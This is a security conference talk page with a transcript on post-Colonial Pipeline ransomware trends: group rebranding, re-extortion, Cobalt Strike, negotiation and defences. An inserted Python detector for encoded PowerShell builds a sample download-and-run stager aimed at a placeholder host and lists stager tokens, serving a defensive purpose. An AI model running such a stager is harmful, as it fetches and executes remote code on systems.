
Ransomware Upheaval: Trends from the Trenches After Colonial Pipeline

BSides Greenville · 2021 · 59:30 · 14 views · Published 2021-07

Style: Talk

About this talk
Special thanks to Keith Swanson of Kivu for sharing with the group!

Ransomware Upheaval: Trends From the Trenches After Colonial Pipeline

After the Colonial Pipeline ransomware incident, the ransomware industry has been turned upside down. Threat actor groups have disbanded, new dark web markets have opened, arrests have been made, actors have turned to Monero, and more cases are exfil only with no encryption involved. We will cover the latest trends we are seeing as we work with and negotiate with threat actors daily. We will cover how actors are evolving their techniques, who they are targeting broadly, and defenses you need to put in place to mitigate a large-scale business interruption.

About Our Presenter

Keith Swanson is the Director of Incident Response at Kivu. Keith is an accomplished information security professional and leader with over 26 years of professional experience in cyber investigations, cybersecurity, digital forensics, and eDiscovery. Keith has an extensive career in law enforcement, as well as serving Fortune 500 companies and multinational clients. Keith joined Kivu after a 26-year career in law enforcement investigating online crime and performing digital forensics. After retiring from law enforcement, Keith has served in managing roles in incident response, investigations, and eDiscovery for CVS Health and American Express Global Business Travel.

To sign up for future event announcements, please send an email to chapter@upstatesc-issa.org.

Transcript [en]

I'm going to share a little something with you guys right now, just to get us going while we're waiting here. Take a look at this: this is the Conti ransomware group's leak site. So this is them, live. We're currently dealing with them. I would show you the chat, but it's got client names and stuff in it, so that wouldn't be... yeah, I probably don't want to. But this is what they do: when there's a leak, this is what it looks like. All right, just let me know when you guys are ready

to get going here and I'll throw up the presentation. We'll do some chat. Yeah, I think we are. And he's actually always got... Do you mind if we record the presentation and put it on YouTube? Oh, absolutely not, absolutely not. All right, good. And Ryan, I still have to post yours, if you're good with that, from the last one. Yeah. Okay, so I'll get those, hopefully this weekend, and I'll get those out there, so you know, a lot of folks weren't able to attend Ryan's last month, and I know there's some folks that aren't going to be able to make it today but still want to be able to watch the presentation, so

I appreciate that, you guys letting us share. So without further ado then, Ryan, do you want to give Keith a little introduction? Sure, I'll do that. Glad to be with everyone today. I have my colleague and co-worker Keith Swanson with us. Keith is former law enforcement; he used to work on the Secret Service task force networks. At Kivu with myself he's one of our directors of incident response, and he leads our counterintelligence and extortion team. So we thought this would be a really timely, a very timely presentation now after the events of last weekend, and then, you know, we're about a month out from, a

month and a half out, I think, or so, from Colonial Pipeline, and we've seen a lot of changes happen in the environment. So we're just going to go through some of those trends of what we're seeing. Hopefully some of this information is obviously useful and helpful to you all and your organizations, and being prepared for that potential next big moment that comes up. So with that, I'll just turn it over to Keith. Thanks, Ryan. As you guys can see, I put this up here; you know, this is live this morning: Conti's leak site, and that's what we're up against. Let me, we'll switch over to

the presentation and we'll start going through that, guys, and then we'll get it going. We're just going to talk about some of the changes that have been going on in ransomware and some of the different tools. A lot of this may be repeat for some of you guys, but it's always good just to, you know, there's so much going on in the world, just to kind of go through everything again. So basically we started in 2009. We focus on the cyber insurance response, and we get involved in just about everything anyway: any kind of breach, a lot of ransomware work, that's our bread and butter, expert witness testimony,

everything. We have offices in Europe and here in the States. We've got people all over the country; we can bring resources to bear rather quickly. Not only do we do investigations and forensics and ransomware and all that stuff, we also have a post-breach recovery team, a remediation and recovery team, which can give you guys extra hands on a scene. Lord knows, when one of these things goes down, there's a lot of Red Bull and Monster being consumed, and we can provide some help. These guys go in; they've rebuilt everything from a two-person mom-and-pop shop up to giant universities, so they've got a lot of resources that we can bring to you guys. Me, like Ryan said, I'm an old,

retired detective. I had 26 years in law enforcement, and one day, and obviously I'm a lot older than that picture, I need to get a new headshot, Ryan, one day the lieutenant walks in and says, hey, you know things about computers, we're going to put you in this computer forensics, computer crimes thing that we're going to be doing. I'm like, uh, okay, and that started all of this. After my retirement I went to work for both CVS Health and American Express Global Business Travel, and these large enterprise environments: at CVS at that time we had 660,000 endpoints. A lot of fun, a lot of late nights and a lot of things going on there, and

at American Express Global Business Travel we were actually spinning off of the larger American Express organization, so we built an entire security program there from scratch. Then I ended up coming here to Kivu. I've arrested hackers as part of the Secret Service task force; we have done interstate fraud, hacking, just about anything. I've sat in the room, we've interviewed these guys, we've had an opportunity to get a lot of different intelligence from these guys, from the feds, you know, just a ton of information. This actually was one of the best experiences in my career, hanging out with those guys and being able to participate in many of their functions.

I even got to do a little bit of protection one time; that was interesting as heck. So I can't say anything bad about my career. It's been long and there's bags under the eyes, but you know, I've enjoyed every minute of it. Let's talk about the threat landscape. The Colonial Pipeline and DarkSide deal has taken the threat landscape and turned it upside down, okay? We've all seen the stuff on the news. This thing had more press than pretty much any ransomware attack we've seen in a long time. What happened was, on May 7th DarkSide got into these guys. DarkSide uses different tactics. They love RDP; if they

find an RDP, boom, they're on it, but they're not against using phishing emails or anything like that. So they get into Colonial Pipeline on May 7. DarkSide uses a rather extensive, I think it's RSA encryption, and they customize keys for each of their victims, so there's no universal decrypter for DarkSide. The ransom in this case ended up being paid; it was 4.4 million. And the poor president and CEO of Colonial Pipeline was stuck between the decision: do I pay the ransom, or I can't get my pipeline back up and running for over a month? Pay, get the pipeline. So really, fuel prices, I live in Arizona, and the effect on fuel

prices out here from this event, we were feeling it out here, they were rising out here, and we're not even on the Colonial Pipeline. So he made the ultimate decision to pay the ransom. So the FBI gets involved. Any time you touch big oil or anything like that, you're going to get a lot of attention, and DarkSide kind of screwed up here. So the Bureau gets involved, and they got into and seized DarkSide servers, and they ended up finding a private key to a Bitcoin wallet, and boom, they were in the Bitcoin wallet, and they were able to recall 2.4 million of the money back. Now DarkSide has been quote-unquote down since

this operation, and all the groups are just going crazy after this, because this is the first time that we've really seen the Bureau reach out and use RICO against these guys effectively, and then, you know, seizing 2.4 million back from these guys out of the blockchain was a big deal, very big deal. So the FBI is not done yet; there's a lot of stuff going on. I had lunch last week with a couple of guys in the Bureau, and they were talking about some of the operations that are going on; there's going to be some more coming. The Biden administration, obviously, you know, this gets press and

they're going to give it some attention because of the press, and so these groups are going to be under some pressure, and they're responding. So groups have stated that they're shutting down. Are they? No, they're not. They're not going to walk away from money like this. The Avaddon group said, okay, we're ceasing operations, and they gave all their private keys to bleepingcomputer.com. There's no way in the world these guys are walking away from this kind of money. They're just going to retool and they're going to go out and reorganize. We're already seeing it: we found new sites up, a new shame site called "by society", and a site called Marketo popped up that

claimed it was the auction site, the whole clearinghouse for stolen data. Marketo is down right now; I checked it this morning. It's getting a lot of attention, but we're also, you know, we're going to see these groups rebrand and rethink themselves. We're also starting to see, and we knew this was coming after DarkSide, attacks that are appearing to be lone wolves. They're not identifying themselves. They're not going to be acting like, oh hey, I mean, Avaddon had a really cool-looking logo, and DarkSide did; they're not going to identify themselves as a group. The reason for that is, if you commit a crime in the furtherance of a criminal

syndicate or a criminal structure like a gang or anything like that, RICO can be used against you. That was designed back in the day to take down, you know, Al Capone and the mafia. Well, they're using it against these groups, so now they've realized, wait a minute, we don't want to have these shame sites with, you know, hey, we're in this group. You're going to see a lot more loosely organized individuals on the surface, but behind them that organizational structure is still there; they're just not going to say who they are. They're changing their communication tactics. The Phobos group went to a completely

encrypted chat portal. You can't even see the chat histories; it's all encrypted, so you can only send, and you can see the one that's sent to you, and after that it's all encrypted. This is in response to what they think is going on and what information they have about what we do, because we collect all these chats that we do and we watch the different verbs that these guys are using and the way they talk to us. Each group is different, right? They all have their version of broken English, but within the groups each individual person that's on the other computer acts differently towards us, and we can tell when we're in a

chat when somebody else takes over on the keyboard, and if we're dealing with somebody who's just a jerk and we see somebody, okay, switch over, then we move quicker. We try to get that person, because they'll make us a better deal or something like that. This ransomware, you know, ransoms are going up. You guys saw this thing with Kaseya over the weekend: REvil/Sodinokibi stated they wanted seven million globally. That's a prime example. These guys are trying to fortify their war chests; they want to get as much money in there, get it protected, get it moved out of the blockchain, get it into bank accounts before

something happens and they get RICO'd, they get 2.4 million dollars taken from them. They're scared to death of that, okay? So that's what's going on right now with the groups. The other thing we're seeing is re-extortion. They're digging in their heels. They'll say, oh yeah, pay me forty thousand dollars and I'll give you the keys. So you pay him forty thousand dollars, and they come back and say, uh, sorry, I want another forty thousand more. We're seeing a lot of that right now. This Kaseya attack with REvil/Sodinokibi, their tactics in this attack are completely different than anything that this group has ever

done. They've never hit anything like this. Typically when REvil or Sodinokibi comes in, they're going to take data and they're going to extort it for every last dime they can. In this hit here, they haven't taken any data that we know of, and they are not threatening to publish any data from this case. Absolutely insane. But they're charging upwards of 45 to 50,000 per unique file extension on the encrypted files. We've had clients that had seven to ten different unique encrypted file extensions; 50 each, 500 grand to get everything decrypted. They have not negotiated; they have been a flat-out no. That tells me that they're trying to

get as much cash as they can, and they're quote-unquote going to shut down. So, threat vectors. Listen, a lot of this stuff you guys understand and know, but drive-by scan and attack: these guys are constantly scanning. They never stop; they're always looking for a crack. That's what happened with Experian: they didn't patch an Apache Struts server, boom, in, and that's all it takes. They're opportunistic. They will not stick to just one technique; they've learned over time that you really limit yourself if you're using one technique, so they will use whatever they can get their hands on. They're constantly buying information on the dark web. They're constantly

looking for zero-days they can get their hands on. The odds are that REvil/Sodinokibi did not find this Kaseya zero-day; they actually bought it and then exploited it. You know, old applications, unpatched vulnerable programs, remote services, RDP, TeamViewer: they're always pounding the heck out of these things; they're in there at all times. We've seen them go after, FortiGate had a problem with their VPNs; there was a vulnerability if you didn't patch it, and we've had more than one client come in because they didn't patch that thing in time, and boom, they got in.

Any time you put a hardware addition in, we've had a couple of clients that stood up hardware before getting it secured, and boom, they hit them. Phishing emails, that's been around forever; it's never going to go away. They're looking at the human side of things. If you send my wife an email that says click here for a free Amazon gift card, she's clicking on it. I guarantee you that's going to happen. Supply chain compromises are a big deal. That's what happened in the Target hack: their HVAC vendor, their AC vendor, was vulnerable, and they had a connection to the Target

enterprise network. They got into the AC vendor because they didn't have the same security standards that Target did, boom, and we all know what happened with that. When we heard the heck of it, that was nightmarish. I've got a cousin that works in the legal department at Target, and it was a nightmare for those guys. So I know that Target, you know, they're big enough to go ahead and survive a hit like that, but a lot of clients aren't. And then valid accounts: there's so many dumps, oh my god. If you look up my name on the dark web, you're going to find me all

over the place. There's so many data dumps anymore; for somebody to say, well, my information is not out there, that's not true. You're out there. If you've purchased a house or a car after Experian and everything, all these guys get hit, you're out there. The DoD got hit, you're out there. Your information is on the web. I just got a letter from Capital One yesterday saying, oh, we've turned down your credit card application. Well, that's because I have my credit file locked. My wife is a retired fraud detective; of course I have my credit file locked, and they weren't able to get in. Why? Because my name's out there, my stuff's out there.

It's just the way society is these days. Ransomware. Here's the official definition of ransomware; it's rather long. I like to tell people that ransomware is nothing more than a way of making sure you can't use your stuff, and that's really what it boils down to. There's a lot of different encryption variations: some will use elliptic curve, some are using Diffie-Hellman; I mean, there's so many different ways to encrypt. The key to it all is, a lot of people are looking for that universal decrypter, and these guys have learned to make sure that you do not use the same key twice, ever. They've learned that. How does it work? The old phishing email.

We all, I mean, we're in information security, so this is what keeps us up at night, because somebody's going to click on that Excel file, and it's going to fire off a macro, and that macro is going to call out to a C2 server. That C2 server is going to download Cobalt Strike, and Cobalt Strike is going to open a beacon, and away we go. This is absolutely insane; it's not going to go away. There is no tool out there that you can say, hey, I'm good. It doesn't work that way. For every tool that's put up and every defense we set up, there's some nerd in his mom's basement or

in a windowless room in North Korea or Russia that's trying to figure out how to get around that tool, and they're going to. There's no sure thing here. We once had a client say, Keith, I need you to write me a letter that says that we're 100% secure. Can't do that. There's no such thing as 100% secure. My network here at home is not 100% secured; my kid hacks it all the time. That's what I get for having an autistic kid; she can get into anything. So we are definitely seeing a lot more sophisticated attacks. This Kaseya attack, yeah, that's huge; that was a good one. The Microsoft Exchange

vulnerability, when Hafnium got into that, interesting. I don't know what happened. The end game wasn't that they had a hook into that many systems. We saw very little data exfiltration on those systems; we saw maybe a handful get locked up with ransomware, but really I don't understand what happened. End game, maybe they got interrupted before they were able to fire off a ransomware campaign or a data exfiltration campaign. Not sure, but that one was weird. Business impacts are huge, absolutely huge. If you're getting one of these things, you're bleeding money. You're down; everything, your finance, payroll, any retail operations, it's down, and money's flying out the

door, because you're paying us, obviously, and you're going to have to get your hardware; you're going to have to buy, you know, it just flies out the door. This third one is the big deal: ransomware as a service. These guys are franchising their operations, and we know when we're dealing with a ransomware-as-a-service crew because we can see it in the communications. These guys are trying to play hardball, like they're kind of, you know, big men on campus: no, no, we're not going to do that. And we've actually had some where we've gone back to the original group and said, hey, you need to calm your boy down over

here, because he's going to ruin your reputation. So that's huge. It's like the old late-night, you can't sleep, you're up at one o'clock in the morning, and you have, hey, make money with my real estate system, I'll teach you how to become a millionaire. They're doing the same thing on the dark web. I'm trying to buy into one of these things to see what we can get into and learn. What was it, LockBit? They got into LockBit's ransomware-as-a-service console; some researchers did. That shut LockBit down for, they haven't seen them back up

yet. And data exfiltration: last year we maybe saw a handful of cases where they're taking data. Right now, I will tell you, pretty much every case, assume they took it. Absolutely assume it. If they don't say it right away, they may come back and say, yeah, I took it. We just had a case where they settled, they got the keys, everything else, and a month later a guy comes back: oh, by the way, I took your data; pay me more. That's what's happening right now. They want the bucks, and a lot of people are paying them to avoid the bad publicity. You know, there's been so many breaches right now,

bad publicity, it's not as bad as it was when Target got hit or Home Depot or any of those guys, but still, people still freak out that there's been a breach, and you're going to lose business. Random spray and pray: that's what they're going to do; they're just throwing everything out there. Internet crime is not about ripping off one person for a million bucks, and this comes straight from a guy named Eric Weinstein that I arrested. Oh god, I think I hit Eric in 2009, and I was interviewing Eric, and he says, Detective, the key to internet crime is not ripping off one person for a million bucks; it's

ripping off a million people for a buck. The internet lets you do that, because you can automate it. This guy was listing 35,000 things a day on eBay. He didn't have any of them to sell, and they were all five, six bucks. No one's going to see, no one's going to look at that. You'll get five, six bucks, yeah, whatever, and then it's not going to get much attention, even from law enforcement. The only reason I got onto Eric is because we saw that volume, and eBay gave me a phone call and we started working. Targeted attacks is what everybody thinks is going on. These are more, when you start looking at

nation states, and you're getting involved with some very, very sophisticated individuals. They're going to say, I want to go hit American Express. Okay, how can I go hit American Express? I mean, it is full-on, typically almost cyber warfare at this point. We've had some talks with some energy providers, and they're like, well, what happens if, you know, like 20 energy providers on the grid get attacked? I said, that's called cyber warfare, and that means that the Biden administration is going to go, hey, Cyber Command, you're on. I mean, that's the way it goes. So targeted attacks, right now we don't see a ton of them. We typically see these random attacks where they just

spray and pray, see if they can get in the door, and go. But if you have a large, you know, or some very, very valuable information, you work for General Dynamics or something like that, yeah, you're going to get targeted, and you need to be working on defending against a targeted attack and a random attack at the same time, because lord knows things happen. What do we do? The old defense-in-depth stuff. This comes right from CISSP, guys. Nothing crazy, but it's always good to go back over it and think about it. You know, antivirus: I cannot tell you how many clients come to us and they're only running antivirus. That's all they've got,

antivirus and the firewall, and time and time again, I would say probably 99.8 percent of our clients, that's all they've got running. Signature-based stuff is done. These guys are using polymorphic malware, and what they've done is they've taken the old Dridex and TrickBot and all these things, and they expand the code by 100 to 200 bytes, and then they just randomly generate in those 200 bytes, boom, you change the file signature, and antivirus is pretty much gone. That's where you get into the endpoint detection and response tools, the CrowdStrikes, the Carbon Blacks. These are the ones that are monitoring and watching for goofy behavior. One of the tools that we see these guys

use all the time is they will fire off a base64-encoded script to bring up Cobalt Strike into memory and start the beacon. Well, a base64-encoded script will set off an alert in CrowdStrike; it will every time. I've used CrowdStrike at both CVS and American Express, and any time a base64 goes, it's going to hit. You should never turn that one off, because I'm telling you right now, that's one of the favorite techniques of the bad guys: they will use base64-encoded scripts. They think by encoding it we're not going to see it. That tells you, wait a minute, something happened on this machine; now you need to watch that machine.
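The base64 alert the speaker describes is the kind of rule an EDR evaluates on every process-creation event. As an added example that is not from the talk or from Kivu's or CrowdStrike's tooling, here is a small Python detector run over a few constructed process-creation log lines: it finds PowerShell's -EncodedCommand flag (and the shorthand prefixes powershell.exe accepts), decodes the UTF-16LE blob, and grades the result so that a malformed blob is still surfaced rather than silently dropped. The key=value log format, the host names, the sample commands and the SUSPICIOUS_TOKENS list are assumptions made for the illustration.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e<letters> <blob>" here and confirm the flag is such a prefix afterwards.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)")
HOST_RE = re.compile(r"\bhost=(\S+)")
CMDLINE_RE = re.compile(r'cmdline="([^"]*)"')

# Assumed token list: substrings common in download-and-run stagers or in attempts to
# run without a window or profile. Presence raises severity; absence does not clear it.
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring",
                     "frombase64string", "net.webclient", "-nop", "hidden")


@dataclass
class Finding:
    host: str
    encoded: str
    decoded: Optional[str]
    tokens: List[str] = field(default_factory=list)

    @property
    def severity(self) -> str:
        if self.decoded is None:
            return "medium"   # blob did not decode: malformed, truncated, or not UTF-16LE
        return "high" if self.tokens else "low"


def encode_for_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> Optional[str]:
    """Reverse of encode_for_powershell; None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def inspect_command_line(host: str, cmdline: str) -> Optional[Finding]:
    """Return a Finding if the command line carries an encoded command, else None."""
    for m in ENC_FLAG.finditer(cmdline):
        if "encodedcommand".startswith(m.group(1).lower()):
            break                       # -ExecutionPolicy etc. also start with -e; skip them
    else:
        return None
    blob = m.group(2)
    decoded = decode_encoded_command(blob)
    # Search the decoded script plus the rest of the command line, with the blob stripped
    # so that a random base64 substring cannot accidentally match a token.
    haystack = ((decoded or "") + " " + cmdline.replace(blob, "")).lower()
    tokens = [t for t in SUSPICIOUS_TOKENS if t in haystack]
    return Finding(host=host, encoded=blob, decoded=decoded, tokens=tokens)


def scan(lines: List[str]) -> List[Finding]:
    """Run the rule over key=value process-creation log lines (constructed format)."""
    findings = []
    for line in lines:
        h, c = HOST_RE.search(line), CMDLINE_RE.search(line)
        if not (h and c):
            continue
        finding = inspect_command_line(h.group(1), c.group(1))
        if finding:
            findings.append(finding)
    return findings


# Constructed sample events: a download-and-run stager, an ordinary -File run that also
# uses an "-E..." flag, a benign encoded command, and a truncated blob.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage')"
BENIGN = "Get-Date"
SAMPLE_LOG = [
    f'2021-07-10T02:13:44Z host=WS-042 cmdline="powershell.exe -nop -w hidden -enc {encode_for_powershell(STAGER)}"',
    '2021-07-10T02:14:01Z host=SRV-DB1 cmdline="powershell.exe -ExecutionPolicy Bypass -File C:\\ops\\rotate_logs.ps1"',
    f'2021-07-10T02:15:09Z host=WS-017 cmdline="powershell.exe -ExecutionPolicy Bypass -EncodedCommand {encode_for_powershell(BENIGN)}"',
    '2021-07-10T02:16:30Z host=WS-099 cmdline="powershell.exe -e QUJDRA"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.severity:6} {f.host:8} tokens={f.tokens} decoded={f.decoded!r}")
```

Running the block prints one line per finding: the stager on WS-042 comes out high, the Get-Date command on WS-017 low, and the truncated blob on WS-099 medium, while the plain -File invocation on SRV-DB1 produces nothing. The point of the three severities is the one the speaker makes: the encoded flag alone is the signal worth keeping on, and the decoded content only decides how loudly to shout.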

Cobalt Strike is a pen test tool. It got out into the environment. We saw Cobalt Strike on five cases a year ago; now, every case. It runs in RAM; it leaves very little, if any, forensic evidence on the hard drives. Absolutely a pain in the butt. Basically it's just like having an open pipe right into the computers, right into your networks, once that beacon is up and running, and it's very difficult to detect. One of the things that we look for is the tools that come in to deploy Cobalt Strike; that tells us what's been going on. But if that is flying out the door in a

Cobalt Strike beacon, it doesn't leave anything on the hard drive; it doesn't need the hard drive. Most of your EDRs right now are detecting the Cobalt Strike beacon, and it'll flag; you know, there should be a siren and red lights and everything. When I was running the security operations center for Amex, I put a sign up on the wall that said "any vehicle hunt on Krebs is a good day." The rest of these are pretty simple stuff: vulnerability management, patch management. You need to be looking at your network; you need to be looking for holes; you need to be looking for things. I'm an old man and I've only had one cup of coffee this morning, so I

can't remember everything that's going on in my network, so it's always good to go in and take a look at what's vulnerable, just to make sure we're patching. Get a pen test done. One of the things that we are seeing is very, very fruitful for organizations is purple team. Don't just, you know, red team is fun; if you're the red team, it's fun; if you're the blue team, it's not that much fun. So a purple team: we bring in the red team to sit right next to the blue team, and while they're hitting you, they're talking to you about what you should be seeing, and vice versa. I did one of these when I

was at Amex, and my guys loved it; they absolutely loved it. They sat down, the pen testers were like, hey, I'm firing off that Metasploit, and the guy's like, I see it, okay, and then we were working from there, and it really trained up these guys. User training: let's face it, man, the human factor. I can tell my wife, stop clicking on those links; she's going to click on them; it's going to happen. Heck, I even designed phishing training that I caught myself with, and I had to go to remedial phishing training that I put together. Disaster recovery: we all know disaster recovery. Here's the difference with disaster recovery, what we see from

clients is, yeah, they've got backups and they've got a disaster recovery plan, but they never tested it, and then something happens and now, oh crap, it's going to take me a week just to restore a couple of backups, because they don't know; they've never done that train-like-it's-real thing. Train like it's real, man. Take some time, run through a scenario, make sure you can get back up from your backups. We all, yeah, we've got them, we know what to do, but as with anything else, you fire up the, you know, the blue bar starts going across, and something goes boom. Okay, make sure that that's going on in there. And we talk to,

you know, I talk to CIOs and CEOs all the time, and it's like, when is this going to be done? When is this going to be done? You don't know, man, you don't know, because there's way too many variables to control during one of these incidents to try to tell you, listen, this is going to take two days. It could take 10 minutes; it could take a week. When I'm processing forensic evidence, I've seen things be done processing in less than a day, and I've seen things take over a week. So there's all these different variables that you can't control, and obviously cyber insurance is a big, big deal to help cover some of these costs.

I literally cannot tell you guys how fast our clients are bleeding money. Multi-factor: you guys hear a lot about multi-factor, and I did a talk with Hanover Insurance a while back. A lot of people think multi-factor is the key; if you have multi-factor, you're done. Not really. What about a zero-day? There's been multi-factor authentication, two-factor authentication, that's had problems, that has had holes. Is it a great tool? Absolutely, awesome tool, but it's not the end-all be-all. And the insurance industry was talking about, oh yeah, multi-factor, multi-factor, multi-factor. Just standing up multi-factor is not going to protect you completely; you still need the rest of the tools. You

still need these things, because something's going to get around, something's going to get past that multi-factor. These guys are constantly working on different techniques to get past it. Antivirus, we talked about that, the polymorphic stuff. Every group is using polymorphic; every time their tools get downloaded from the command and control servers, it's got a different file signature. We've got to bring more up front than just antivirus. EDRs: this is where it's at, guys. These are the tools right now that are probably the best in class. We use CrowdStrike; we partner with CrowdStrike here at Kivu. I've used CrowdStrike in large environments; it's very, very good. It's a very, very solid

product, and it helps protect, and the thing about it is, if something gets past everything and it affects the machine, you can isolate that machine with a keystroke. I think it's "isolate". So now instead of having 50 computers infected you have one. That really is the key: okay, somebody's going to get in the door; you're just going to slam the door on them and cut off their heads. Disaster recovery: the plan is the key, and I'm aging myself with the reference to the A-Team there; I'm absolutely aging myself with that reference to the A-Team. But the bottom line is, the big problem that we see is, yep, we've got a plan. When was the last time you

ran a test on it, or you tried to recover? We never have. And things pop up and things go boom during the backup process. You know, automated backups are great, but there's always something. The 3-2-1 rule: even my wife has figured this one out, and she's the most untechnical person in the world; that woman could break an iPhone. Three copies of your data: one in production, one in an online backup for business continuity in cases of system crashes, and that last one, one offline for disaster recovery. That's the key. If you're using something like Veeam, great tool, man, great tool, but if it's still online and the bad guy sees it, they're all over

it they're going to encrypt that sucker or they're going to delete it you're done you got to pay them because you don't have any more backups if you keep that one copy offline with a bad guy can't see it there's no connection from your network to that copy of the disaster recovery backups you're golden now you can start bringing those things in start bringing everything back up to speed you can get back up running a heck of a lot quicker and you don't make you don't have to pay a ransom at that point you don't have to pay so obviously the frequency of the data is based on how much can you guys risk losing and still be able to

function is that you know hey i can lose a week hey saturday night at two o'clock in the morning let's run a full back up kick it offline to maybe throw it in aws or something like that and then close that net and close that hole and then get back to work here's what it looks like cyber insurance but if you guys get hit you're going to call your cyber insurance company they're going to call a breach coach the breach coach our attorney said are this is what they do they're all about the privacy laws they're all about the regulations and they're going to walk you through that they're going to call us hopefully us

right and they're gonna get we're gonna get started do we need to talk to the bad guys we're gonna sit on a scoping call we're gonna say all right where you guys at you guys tell me hey listen i've got backups um it's gonna take me a week or so to get recovered from backups can you buy me some time excellent my team's gonna get a hold of these guys we're gonna start talking to them and we're gonna start dragging these things out just making it you know drag drag drag drag drag and get you that time or if you come up and tell me say keith i don't have any backups they deleted them we're completely burnt down

and we're losing a million dollars a day all right we're going to speed that thing up you're not going to get the best price because obviously the longer we can negotiate or work these guys over the best we can but we're going to get you those keys as quickly as possible for the best price we can and you know we're gonna we always make these guys prove number one you gotta prove what they pay for you know that they can decrypt you get what you paid for and we we know all these different groups for example the phobos group their decrypters stink absolutely distinct because we only see maybe 60 to 65 file recovery and that's after going

back three or four times and getting re-extorted three or four times with this junk that these guys are putting out so we can help you with all that we have our forensic team our instant response teams they're going to come in and they're going to look at all the evidence we have a tool we created called tech where the hell with this was when i was working all those cases at two o'clock in the morning imaging computers should have smacked my old boss but it collects just the logs we need only the logs that we need and leaves it so we can scalpel through these this information as quickly as possible and get to patient zero

tell you guys what happened see what data was taken and get the answers to the attorneys so that you guys can make the legal moves that you need to make did you pay well there's a lot of things you mean the fbi says never pay it well that's great you know and when i was a cop never pay but when you're burnt down and your business is basically done and 500 people are out of a job you know it's not as simple as that and i understand that now um we can't pay some people the office of foreign asset control otak has sanctioned a couple of groups uh one of them being evil corp uh and you're gonna see there's some

articles running around and found on linkedin that said that our evil sonoka bee is linked to evil corp we have never seen that i don't know where this reporter got that information i challenged her on it on on linkedin i haven't heard back from it but our evil soldiers have been in place for a long time and we know there's no connection to that because evil corp who is another group yeah they're sanctioned there there's there's sanctions against them and you cannot pay anybody that may have links to evil court you cannot pay anybody that has links to iran cuba north korea so we that's a big deal and we take that very seriously here

we go through a an investigation just just to determine that gdpr pci uh a hipaa these kind of things what kind of regulations are there under hipaa rules and this is coming from the attorneys the breach coaches they told me that even having a ransomware event is considered a breach period whether they took data or not and uh so there's but there's some legalities and those that's what those breach approaches are for i i tried to read like the california uh privacy and notification laws i i woke up three days later i don't know what happened business factors this is the thing how long can you survive listen you know target's got all kinds of resources huge

corporation they could survive that hit can your court your organization survive a hit like that you know that that is you know that's a question that you have to think about technical factors one of the things that a lot of the ceos and the cfos and all the the c-suite do not understand is if you buy these keys it's not like here's the key you run it and all the lights come on and everything's fine that's not the way it works minimum minimum if you pay for decryption keys and tools you've got a minimum of at least a week it just destroys databases corrupt files connections are dead you there's so much that you have to fix even after

decryption that at a minimum it's going to be a week and there's no way around that there's you cannot throw enough people at it the computers only run so fast if you've got a two terabyte database that you need to decrypt you're going to be there for a while decrypting it the little the little green bar is going to be real slow running across the screen i wouldn't bet on that one so these are the likelihood of decryption succeeding that's what we watch we talk to all of our clients and say how much did you guys get back oh we got like 95 percent of our files back we great we make a note you know so that

way we know hey this group 95 comes back this is the time for question guys uh just fire them out there um you know like i said i've been uh involved with law enforcement on the federal side on the task force on the local side state side um we've arrested a ton of these guys you know we're in the my team is is into the chat rooms in the dark web we're watching these guys we're talking to them on a daily basis um i have yet to have any send me a case of vodka but i have asked but you know i've yet to have anybody send me a case so fire away

oh come on guys you gotta have something for me so you either scare them the death keys or or something i heard someone hey this is dave burlingame um i had a bad connection in the the beginning of this is i and i see that this recording has uh or that this session's been recorded can i get a copy or access to it so i can hear the first part yes sir um david michael is hoping to be able to pull these down and upload him to youtube um he said this weekend so okay yeah well uh seriously you know my information's on the screen brian has it we can get it to you guys if you guys

have questions questions are free my team is always available to assist anybody with questions about these ransomware groups um it's forever changing don't don't ever feel not going to charge your time send a question we'll take care of your money for someone looking to get into the field of what you do particularly threat intelligence where would you recommend starting sans has got a really good threat intelligence course um it's it's a good place to start their courses are expensive but we all know that they're pretty damn good training that's a good place to start because there's a lot of different tools out there there's some open source tools samosa and stuff and then there's also some you know paid for platforms

and just having the knowledge of what's out there and you know some some hands-on to start using it is key you know the hard part about threat intelligence is there's so much of it and a lot of it is a repeat of what somebody else said to try to get it vetted down into something that you can use so i would start with something like that um the other thing is there's a ton of blogs out there i mean we all know about krebs um brian's brian writes some really good stuff um met the guy a few times really got a lot of insight into these threat actors uh bleeping computer is a good source um

you can get on a dark web but obviously there's no google for the dark webs you're gonna have to put hunt and poke around a little bit and see what you can find we've gotten into some chat rooms on uh that are in russian uh so i have to you know use google translate a lot but you know start with something like that um from a threat intelligence standpoint uh look at the mis misp the mist server it is a free tool that you can get feeds into as open source very great tool and that's that's where i would go to get started on thank you sir hey this is barbara carr yes sir yeah i just appreciate it man

gif that that's a that's a good start for us not technical security people um but i think it's it's this this environment you just described is kind of challenging nowadays because of all these work from home especially people bringing their work laptop at home and come the next day to the office and all those things will open doors for all these guys um i'm working on the healthcare system and that's one of the nowadays one of the most targeted beside the banks um so what do you what's your recommendation what what you feel about it with all this everything going and going on and well right now well my first thought is that investing in commercial real estate is

bad i would not do it right now because people here people don't want to go back to the office and the number one thing is nothing touches your network that you do not have security control over ever period okay we've seen clients before they're allowing their client you know their workers to use their personal laptops to connect into the network get a gold image with all your security tools on it make sure everything across the board has all your security tools vpn nothing touches your network without a vpn ever okay make sure that you're patching the hell out of that vpn because fortigate just had a problem with theirs but vpn i have seen uh when i was at american express we

were looking at going to a vdi environment where we were going to be giving our work from home people basically a dumb terminal and all that terminal could do is it could connect one ip and it would spin up a vm and at the end of the day when they were done and they shut down it killed that vm and that dumb terminal couldn't do anything else that's expensive but that's an option the other thing is is we have we have seen some clients and i know some organizations that will go to their work from home and set up their networks for them and make sure that they're secure um a lot of people you know they bring

